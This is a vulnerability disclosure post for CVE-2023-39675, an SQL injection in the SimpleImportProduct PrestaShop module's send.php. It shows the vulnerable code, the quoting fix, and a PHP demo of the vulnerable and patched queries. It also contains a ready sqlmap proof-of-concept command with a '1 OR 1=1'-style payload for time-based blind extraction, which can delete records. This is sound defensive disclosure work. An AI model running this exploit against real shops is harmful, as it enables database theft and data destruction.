
SQLi in SimpleImportProduct Prestashop Module CVE-2023-39675

This blog post details an SQL Injection we found within SimpleImportProduct, a Prestashop module developed by MyPrestaModules. In modules/simpleimportproduct/send.php there is the following code:

  if (Tools::getValue('remove') == true) {
      // attacker-controlled request parameter
      $key = Tools::getValue('key');
      // pSQL() escapes quote characters in the value
      $key = pSQL($key);
      // the escaped value is interpolated without surrounding quotes,
      // so it is parsed as part of the SQL, not as a string literal
      Db::getInstance()->delete('simpleimport_tasks', "import_settings=$key");
  }

This is vulnerable to SQL injection, which allows an attacker to extract data from the database.
The key parameter is passed through pSQL(), which escapes quote characters, but the escaped value is then placed in the query without surrounding quotes, so an attacker can still alter the query without needing a quote character at all. This is a similar situation to an SQLi I found in a different Prestashop module.

Adding quotes around the key would be sufficient to patch this SQLi:

  Db::getInstance()->delete('simpleimport_tasks', "import_settings='$key'");
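To make the quoting point concrete, here is a small stand-alone PHP script, added here and not code from the module or from Prestashop, that mimics the quote-escaping part of pSQL() with addslashes() and builds the DELETE query the vulnerable way and the patched way. The ps_ table prefix, the column name and the sample inputs are assumptions.

```php
<?php
// Added example, not the module's code. A simplified stand-in for
// PrestaShop's pSQL(): it escapes quote and backslash characters,
// which is the part of pSQL() that matters for this bug.
function pseudo_pSQL(string $value): string
{
    return addslashes($value);
}

// Vulnerable form from send.php: the escaped value is interpolated
// without surrounding quotes, so it is parsed as SQL, not as a string.
function build_delete_vulnerable(string $key): string
{
    $key = pseudo_pSQL($key);
    return "DELETE FROM ps_simpleimport_tasks WHERE import_settings=$key";
}

// Patched form: same escaping, but the value now sits inside quotes,
// so whatever is sent stays a single string literal.
function build_delete_patched(string $key): string
{
    $key = pseudo_pSQL($key);
    return "DELETE FROM ps_simpleimport_tasks WHERE import_settings='$key'";
}

// Constructed inputs: a legitimate key, a tautology that needs no quotes,
// and a quote-based tautology that pSQL()-style escaping does handle.
$inputs = ['1', '1 OR 1=1', "1' OR '1'='1"];
foreach ($inputs as $input) {
    echo "input:      $input\n";
    echo "vulnerable: " . build_delete_vulnerable($input) . "\n";
    echo "patched:    " . build_delete_patched($input) . "\n\n";
}

// Without quotes the WHERE clause of the vulnerable query becomes
// "import_settings=1 OR 1=1", which is true for every task row.
assert(build_delete_vulnerable('1 OR 1=1')
    === "DELETE FROM ps_simpleimport_tasks WHERE import_settings=1 OR 1=1");

// With quotes the same input is compared as the literal string
// '1 OR 1=1' and matches nothing; quote characters arrive escaped.
assert(build_delete_patched('1 OR 1=1')
    === "DELETE FROM ps_simpleimport_tasks WHERE import_settings='1 OR 1=1'");
assert(build_delete_patched("1' OR '1'='1")
    === "DELETE FROM ps_simpleimport_tasks WHERE import_settings='1\\' OR \\'1\\'=\\'1'");
```

If import_settings is a numeric column, casting the value with (int) before interpolation is the other common PrestaShop idiom; the fix shown above quotes it instead, which works regardless of the column type.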

Proof of Concept

To test this we used sqlmap on a local Prestashop install. Care should be taken when testing for this, as the injection point is inside a DELETE query and testing can result in records being deleted. sqlmap command:

sqlmap -u "http://localhost:8080/modules/simpleimportproduct/send.php?ajax=true&remove=true&key=1*" --threads=10 --random-agent --dbms=mysql --level=5 --risk=3 --tables

It’s a “blind” SQLi, as the injection doesn’t affect the contents of the page, so information is extracted using SLEEP() to change the time the server takes to respond.

Timeline

Date         Action
10/07/2023   Issue discovered during a pentest
12/07/2023   Reported issue to MyPrestaModules
29/07/2023   Requested CVE from MITRE
??/08/2023   Patch released
28/08/2023   CVE number CVE-2023-39675 assigned
07/09/2023   Blog post released